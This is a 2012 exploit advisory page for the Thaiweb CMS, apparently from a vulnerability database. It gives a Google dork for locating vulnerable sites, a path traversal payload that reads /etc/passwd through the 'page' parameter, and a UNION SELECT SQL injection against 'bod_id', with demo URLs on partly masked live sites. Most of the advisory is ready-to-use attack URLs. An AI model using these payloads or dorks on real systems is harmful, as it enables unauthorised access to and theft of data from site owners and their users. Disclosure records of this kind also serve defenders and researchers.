Thaiweb <= Remote File Inclusion Vulnerability

2012.12.20
Credit: GoLd_M
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98
Dork: intext:powered by Thaiweb. inurl:index.php?page=board.php

# Exploit Title: Thaiweb <= Remote File Inclusion Vulnerability # Date: 19/12/2012 # Author: GoLd_M (Libyan) Page FaceBook (http://www.facebook.com/pages/337878286310383) # Category:: Local File Disclosure Vulnerability # Google Dork: intext:powered by Thaiweb. inurl:index.php?page=board.php # Ex :[Thaiweb]/index.php?page=../../../../../../../../../../../../../etc/passwd # Demo: # 01 :http://giXXX.th/index.php?page=../../../../../../../../../../../../../etc/passwd # 02 :http://www.keyXXXsin.com/index.php?page=../../../../../../../../../../../../../etc/passwd # 03 :http://www.reaXXwebthai.com/index.php?page=../../../../../../../../../../../../../etc/passwd # Google Dork: intext:powered by Thaiweb. inurl:index.php?page=board.php # Ex :[Thaiweb]/index.php?page=boardque.php&bod_id=4' # Demo: # 01 :http://www.keyXXsin.com//index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316-- # 02 :http://wwXXartnerthailand.com/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316-- # 03 :http://gifXX.th/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316-- # 1337day.com [2012-12-20]

References:

http://www.facebook.com/pages/337878286310383


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top